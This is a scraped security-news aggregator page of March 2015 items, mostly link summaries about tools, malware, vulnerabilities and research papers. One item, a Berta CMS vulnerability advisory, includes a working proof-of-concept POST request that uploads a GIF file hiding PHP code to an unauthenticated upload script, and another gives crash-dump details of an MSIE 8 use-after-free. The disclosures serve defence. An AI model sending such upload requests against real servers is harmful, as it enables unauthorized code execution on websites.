Are you the publisher? Claim or contact us about this channel


Embed this content in your HTML

Search

Report adult content:

click to rate:

Account: (login)

More Channels


Showcase


Channel Catalog


Channel Description:

This Website Contains Information of Real Estate Sales and Rentals in New York City

older | 1 | .... | 275 | 276 | (Page 277) | 278 | 279 | .... | 404 | newer

    0 0
  • 03/26/15--08:11: dnscat2 beta release!
  • As I promised during my 2014 Derbycon talk (amongst other places), this is an initial release of my complete re-write/re-design of the dnscat service / protocol. It's now a standalone tool instead of being bundled with nbtool, among other changes. :)

    more here........https://blog.skullsecurity.org/2015/dnscat2-beta-release

    0 0

    With the recent increase of notifications of cryptolocker malware I was wondering if this dropped malware was always the same version or if the attackers used different versions. I was also curious if the delivery path (e-mail route or otherwise) was different. This raised the question : “How to share malware with a security team?”.

    Some teams have a service where you can upload samples. If they do not have an upload service then you will have to use more traditional methods.

    more here.........http://www.vanimpe.eu/2015/03/26/how-to-share-malware-with-a-security-team/

    0 0

     Imperva, Inc. (NYSE:IMPV), committed to protecting business-critical data and applications in the cloud and on-premises, today released its latest Hacker Intelligence Initiative (HII) report, "Attacking SSL when using RC4: Breaking SSL with a 13-year old RC4 Weakness." Authored by the company's Application Defense Center (ADC) research team, the report reveals new attack vulnerabilities on the popular Transport Layer Security (TLS/SSL) protocol, which is currently used to protect as many as 30 percent of all SSL transactions, a number that may equate up to billions of TLS connections per day.

    more here.........http://globenewswire.com/news-release/2015/03/26/719155/10126441/en/Imperva-Releases-Latest-Hacker-Intelligence-Initiative-Report-Attacking-SSL-When-Using-RC4.html

    0 0

    from the keeping-you-safe...-or-keeping-you-vulnerable dept
    Back in October, we highlighted the contradiction of FBI Director James Comey raging against encryption and demanding backdoors, while at the very same time the FBI's own website was suggesting mobile encryption as a way to stay safe. Sometime after that post went online, all of the information on that page about staying safe magically disappeared, though thankfully I screenshotted it at the time

    more here.........https://www.techdirt.com/articles/20150325/17430330432/fbi-quietly-removes-recommendation-to-encrypt-your-phone-as-fbi-director-warns-how-encryption-will-lead-to-tears.shtml

    0 0

    Abstract
    Binary symbolic execution systems are built from complicated stacks of unreliable
    software components, process large program sets, and have few shallow decisions.
    Failure to accurately symbolically model execution produces infeasible paths which
    are difficult to debug and ultimately inhibits the development of new system features.
    This dissertation describes the design and implementation of klee-mc, a novel binary
    symbolic executor that emphasizes self-checking and bit-equivalence properties.
    This thesis first presents cross-checking for detecting causes of infeasible paths.
    Cross-checking compares outputs from similar components for equivalence and reports
    mismatches at the point of divergence. This approach systematically finds errors
    throughout the executor stack from binary translation to expression optimization.
    The second part of this thesis considers the symbolic execution of floating-point
    code. To support floating-point program instructions, klee-mc emulates floatingpoint
    operations with integer-only off-the-shelf soft floating-point libraries. Symbolically
    executing these libraries generates test cases where soft floating-point implementations
    and floating-point constraint solvers diverge from hardware results.
    The third part of this thesis discusses a term rewriting system based on program
    path derived expression reduction rules. These reduction rules improve symbolic
    execution performance and are machine verifiable. Additionally, these rules generalize
    through further processing to optimize larger classes of expressions.
    Finally, this thesis describes a flexible mechanism for symbolically dispatching
    memory accesses. klee-mc forwards target program memory accesses to symbolically
    executed libraries which retrieve and store memory data. These libraries simplify
    access policy implementation and ease the management of rich analysis metadata

    more here..........http://web.stanford.edu/~ajromano/dis.pdf

    0 0

    One month ago we asked the community for feedback about how they use Metasploit and what they want to see in the Meterpreter payload suite going forward. Over the course of a week we received over 400 responses and over 200 write-in suggestions for new features. We have spent the last month parsing through your responses, identifying dependencies, and actively delivering new features based on your requests. These requests covered 20 different categories

    more here...........https://community.rapid7.com/community/metasploit/blog/2015/03/26/meterpreter-2015-you-spoke-we-listened

    0 0

    ​TL;DR: Full disclosure of low risk 0-day in MSIE 8 after 60-day deadline
    passed
    without a fix.

    1501H - MSIE 8 - F12 Developer Tools tooltips use-after-free
    =====================================

    Synopsis
    --------
    When using the Developer Tools of MSIE 8, one might hover the mouse over a
    button in the "Script" tab, at which point a "tooltip" is shown. If one then
    clicks the button, a use-after-free occurs.

    Known affected software and attack vectors
    ------------------------------------------
      + MSIE 8

        An attacker would need to get a target user to open a specially crafted
        webpage. The attacker would then need to trick the target user into
    hovering
        the mouse over a button until the tooltip is shown and then click the
        button.

    Description
    -----------
    Open a new tab, and then open the Developer Tools by pressing F12, or
    selecting it from the "Tools" menu. Then select the "Scripts" tab in the
    Developer Tools window. Next hover the mouse over one of the buttons with
    the
    text "Start Debugging", "Run Script" and "Multi Line Mode"/"Single Line
    Mode".
    When a tooltip is shown, click the button. Here's what happens next with
    paged
    heap enabled:

    (4dc.814): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0b507fd0 ebx=00000200 ecx=06a48ea0 edx=00000001 esi=06a48ea0
    edi=09a21fd0
    eip=7427c0d6 esp=0b40f98c ebp=0b40f98c iopl=0         nv up ei pl nz na po
    nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
    efl=00010202
    comctl32!CToolTipsMgr::PopBubble+0xc:
    7427c0d6 8b400c          mov     eax,dword ptr [eax+0Ch]
    ds:0023:0b507fdc=????????

    1:019> kP
    ChildEBP RetAddr
    0b40f98c 7427aa85 comctl32!CToolTipsMgr::PopBubble+0xc
    0b40f9b4 741fc26a comctl32!CToolTipsMgr::HandleRelayedMessage+0x117
    0b40faec 741fbf57 comctl32!CToolTipsMgr::ToolTipsWndProc+0x944
    0b40fb18 7651c4e7 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x32
    0b40fb44 7651c5e7 USER32!InternalCallWinProc+0x23
    0b40fbbc 76515294 USER32!UserCallWinProcCheckWow+0x14b
    0b40fbfc 76515582 USER32!SendMessageWorker+0x4d0
    0b40fc1c 741fc235 USER32!SendMessageW+0x7c
    0b40fc58 741f42aa comctl32!RelayToToolTips+0x49
    0b40fc78 741ff5ee comctl32!TTSubclassProc+0x33
    0b40fcdc 741ff490 comctl32!CallNextSubclassProc+0x3d
    0b40fd3c 7651c4e7 comctl32!MasterSubclassProc+0x54
    0b40fd68 7651c5e7 USER32!InternalCallWinProc+0x23
    0b40fde0 7651cc19 USER32!UserCallWinProcCheckWow+0x14b
    0b40fe40 7651cc70 USER32!DispatchMessageWorker+0x35e
    0b40fe50 6e8e98ef USER32!DispatchMessageW+0xf
    WARNING: Stack unwind information not available. Following frames may be
    wrong.
    0b40fe84 6e8ee3fb iedvtool+0x598ef
    0b40fe9c 76ceee1c iedvtool+0x5e3fb
    0b40fea8 770c37eb kernel32!BaseThreadInitThunk+0xe
    0b40fee8 770c37be ntdll!__RtlUserThreadStart+0x70
    0b40ff00 00000000 ntdll!_RtlUserThreadStart+0x1b

    1:019> !heap -p -a @eax
        address 0b507fd0 found in
        _DPH_HEAP_ROOT @ 161000
        in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr
    VirtSize)
                                        b5119f4:          b507000
    2000
        6fb3947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
        7712620b ntdll!RtlDebugReAllocateHeap+0x00000033
        770ee4f0 ntdll!RtlReAllocateHeap+0x00000054
        741f27fe comctl32!CToolTipsMgr::AddTool+0x00000031
        741f28ca comctl32!CToolTipsMgr::ToolTipsWndProc+0x000009a4
        741fbf57 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x00000032
        7651c4e7 USER32!InternalCallWinProc+0x00000023
        7651c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
        76515294 USER32!SendMessageWorker+0x000004d0
        76515582 USER32!SendMessageW+0x0000007c
        69cc8c71 jsdbgui+0x00028c71
        69cc8fa2 jsdbgui+0x00028fa2
        69cc903b jsdbgui+0x0002903b
        69cca6e2 jsdbgui+0x0002a6e2
        69cc5513 jsdbgui+0x00025513
        7651c4e7 USER32!InternalCallWinProc+0x00000023
        76535b7c USER32!UserCallDlgProcCheckWow+0x00000132
        765359f3 USER32!DefDlgProcWorker+0x000000a8
        7653a60e USER32!SendMessageWorker+0x00000340
        76515582 USER32!SendMessageW+0x0000007c
        741fc05d comctl32!CCSendNotify+0x000003e3
        741f364c comctl32!SendNotifyEx+0x00000063
        7427a9f4 comctl32!CToolTipsMgr::PopBubble+0x000000a3
        7427c016 comctl32!CToolTipsMgr::PopBubble+0x0000001c
        7427b50b comctl32!CToolTipsMgr::ShowVirtualBubble+0x00000010
        741fc26a comctl32!CToolTipsMgr::ToolTipsWndProc+0x00000944
        741fbf57 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x00000032
        7651c4e7 USER32!InternalCallWinProc+0x00000023
        7651c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
        76515294 USER32!SendMessageWorker+0x000004d0
        76515582 USER32!SendMessageW+0x0000007c
        741fc235 comctl32!RelayToToolTips+0x00000049

    Exploit
    -------
    Because the attacker vector appears highly unlikely to represent a risk to
    any
    user, I did not bother to do an in-depth investigation. However, the
    use-after-
    free occurs in the same process in which the web-page is rendered. This
    suggests
    that there may be a way for the web-page to reallocate the freed memory
    before
    its reuse and potentially exploit this issue. However, it appears that the
    free
    and re-use occur in a very short time span, which would make that rather
    hard if
    not impossible.

    Notes
    -----
    I allow vendors 60 days to fix an issue, unless they can provide an adequate
    reason for extending this deadline. Failure to meet a deadline without an
    adequate explanation will normally result in public disclosure of
    information
    regarding the vulnerability to the general public.

    Timeline
    --------
    23 January 2015: vulnerability discovered and reported to MSRC by email.
    23 January 2015: email from MSRC acknowledges receipt of report.
    25 March 2015: email to MSRC to notify them that deadline has been exceeded.
    25 March 2015: Full disclosure of vulnerability details.

    0 0

    Berta CMS is a web based content management system using PHP and local file storage.

    http://www.berta.me/

    Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software.

    We found that the file upload didn't require authentication.

    Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.

    It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.

    http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>

    We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.

    The author was notified: 2015-03-22
    Author Acknowledge: 2015-03-23
    Patch released: 2015-03-26

    The berta-0.8.10b.zip file from: http://www.berta.me/download/  includes a fix that requires authentication to upload files.


    This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).


    The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.

    POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101/upload.html
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
    Content-Length: 1617

    -----------------------------2147563051636691175750543802
    Content-Disposition: form-data; name="Filedata"; filename="c.php"
    Content-Type: text/php

    GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$­]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64
    ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ    p §Qd‹
    P­s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö­a[q¥Î•P—Ë]Yy o™„ mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë     ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{        ®ç Ö„Ôàƒ$
    ¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <­H£A5å‚£$;FÉ£ŒJúw Z     žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v
    3jy'ž„šÉç£/øY …B
    h¤œ^ž f<‹’FP‹(n %¤¤² )›q
    *{\j0§¦už *f;©ê£¨Ž–ª«   § Ú¦­kÒ¥`ž‚
    k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/*
    `ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«­ £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ ­Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³­²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k­øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°<
    éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ  ;

    -----------------------------2147563051636691175750543802
    Content-Disposition: form-data; name="submit"

    Upload Image
    -----------------------------2147563051636691175750543802--




    Simon Waters

    phone  +448454681066
    email  simon.waters@surevine.com
    skype  simon.waters.surevine


    Participate | Collaborate | Innovate

    Surevine Limited

    0 0

    I’ve been spending some time recently combing through the old Matasano Blog Catacombs and blowing the dust off years old tomes. It’s been amazing to see how much information from years ago is still relevant today. Case in point: “Enough With the Rainbow Tables: What You Need to Know About Secure Password Schemes” by Thomas Ptacek. In that post, Tom discusses the fascination with Rainbow Tables, and gives some solid guidelines on secure password storage. He goes on to explain why the focus on rainbow tables is flawed and risks missing the true threat. If you haven’t read it, go read it now. I’ll wait.

    Back? Okay, good. Now I’d like to expand on what’s changed since that post, and why its message is still relevant today.

    more here........http://chargen.matasano.com/chargen/2015/3/26/enough-with-the-salts-updates-on-secure-password-schemes.html

    0 0

    Talk from SyScan 2015 about Apple Security failing to patch vulnerabilities over and over again, because they have apparently no QA at all on security patches.

    more here.....http://www.slideshare.net/i0n1c/syscan-2015-esserios678securityastudyinfail

    0 0

    The URSNIF malware family is primarily known for being a data-stealing  malware, but it’s also known for acquiring a wide variety of behavior. Known URSNIF variants include backdoors (BKDR_URSNIF.SM), spyware (TSPY_URSNIF.YNJ), and file infectors (PE_URSNIF.A-O).

    more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/

    0 0

    The challenge was delivered as a zip file (InsomniDroid.zip). The first challenge was perhaps to download it (with its 602.5 MiB). The zip file contains a single file: mmcblk0.dd. A file command gives some information
    more here.....http://blog.scrt.ch/2015/03/27/insomnihack-finals-insomnidroid-level-1-writeup/

    0 0

    Abstract
    The advent of pervasive ubiquitous computing and advancement of wireless
    communication technologies has resulted in the proliferation of innovative
    mobile computing devices like tablets and smartphones. In
    consumer market and business community worldwide, smartphones have
    become the most reliable portable devices for Internet connectivity and
    sensitive data storage. As smartphones are becoming the core delivery
    platform for ubiquitous “connected customer services” paradigm;
    security threats and concomitant risks are also growing proportionally.
    Recent reports from security vendors highlight this emerging challenge.
    Additionally, smartphones pose limitations for security solution architects,
    such as limited computing power, memory, battery and peripherals
    etc. This makes the desktop security countermeasures infeasible for
    smartphone devices. Some known anti-malware commercial products
    for smartphones – by top ranked security vendors – are signature based
    and require continuous updating for latest malware detection. Moreover,
    these products are unable to detect the zero-day and polymorphic
    malwares for smartphones. Therefore, we argue that the domain of
    non-signature based anti-malware solutions for smartphones is open for
    research.
    In this dissertation, a novel security framework is proposed for malware
    detection on Linux based computers and smartphones using different
    data mining approaches.

    more here.......http://nexginrc.org/Publications/pub_files/Farrukh_thesis_v2.pdf

    0 0

    As a Chinese living outside China, I frequently visit Chinese websites, many of which use advertising and visitor tracking provided by Baidu, the largest search engine available in China. As I was browsing one of the most popular Chinese infosec community in China, zone.wooyun.org, at around 12:00pm GMT+8, my browser suddenly started to pop up JS alerts every 5 seconds.

    This is in Chinese so utilize translation software if you do not speak the language. You can read more here http://drops.wooyun.org/papers/5398 and the translated english version here if you are unable to access translation software....http://webcache.googleusercontent.com/search?q=cache:http://insight-labs.org/?p=1682


    click here for additional explanation.....https://thenanfang.com/why-baidu-was-hijacked-to-attack-github/

    0 0

    During a recent mobile application security analysis for one of our clients, we identified a quite unobvious behaviour in apps that use the AFNetworking library.

    It turned out that because of a logic flaw in the latest version of the library, SSL MiTM attacks are feasible in apps using AFNetworking 2.5.1.

    more here..........http://blog.mindedsecurity.com/2015/03/ssl-mitm-attack-in-afnetworking-251-do.html

    0 0
  • 03/27/15--03:26: Git from the inside out
  • This essay explains how Git works. It assumes you understand Git well enough to use it to version control your projects.

    The essay focuses on the graph structure that underpins Git and how the properties of this graph dictate Git’s behavior. This focus on fundamentals lets you build your mental model on the truth, rather than on hypotheses constructed from evidence gathered while experimenting with the API. This truer model gives you a better understanding of what Git has done, what it is doing, and what it will do.

    more here.......https://codewords.recurse.com/issues/two/git-from-the-inside-out

    0 0

    ABSTRACT
    This paper provides a technical overview of the
    HARES software protection research effort performed
    by Assured Information Security. HARES is an
    anti reverse-engineering technique that uses on-CPU
    encryption [6] in conjunction with Intel x86 TLBsplitting
    [11] in order to significantly increase the
    effort required to obtain the clear-text assembly instructions
    that comprise the target x86 application.
    Performance and use-cases of the system are presented,
    and a number of weaknesses and future
    works are discussed. Related works are compared
    and contrasted with HARES in order to highlight
    its improvements over the current state-of-the-art.


    more here............http://jacobtorrey.com/HARES-WP.pdf

    0 0

    This quick post will cover the topic of code streaming. For example, take malware. One way for malware to hide and persist on a system is to not contain any malicious code. This is done by getting the malicious payload through an external source, such as a direct request to a web server, a Twitter/social media post, a Pastebin, or any other common mechanism. This code, usually encrypted or obfuscated in some way, is then mapped in to the malicious process and executed. After execution, the memory region is cleaned up and reused or reallocated in order to carry out further malicious functionality.

    more here.........http://www.codereversing.com/blog/?p=194

    0 0

    Abstract:
    We present a new technique and system, DIODE, for auto- matically generating inputs that trigger overflows at memory allocation sites. DIODE is designed to identify relevant sanity checks that inputs must satisfy to trigger overflows at target memory allocation sites, then generate inputs that satisfy these sanity checks to successfully trigger the overflow. DIODE works with off-the-shelf, production x86 binaries. Our results show that, for our benchmark set of applications, and for every target memory allocation site exercised by our seed inputs (which the applications process correctly with no overflows), either 1) DIODE is able to generate an input that triggers an overflow at that site or 2) there is no input that would trigger an overflow for the observed target expression at that site.

    more here...........http://dspace.mit.edu/handle/1721.1/96155

    0 0
  • 03/27/15--06:45: sysmon-queries
  • Queries to parse sysmon event log file with Microsoft logparser

    more here..........https://github.com/JamesHabben/sysmon-queries

older | 1 | .... | 275 | 276 | (Page 277) | 278 | 279 | .... | 404 | newer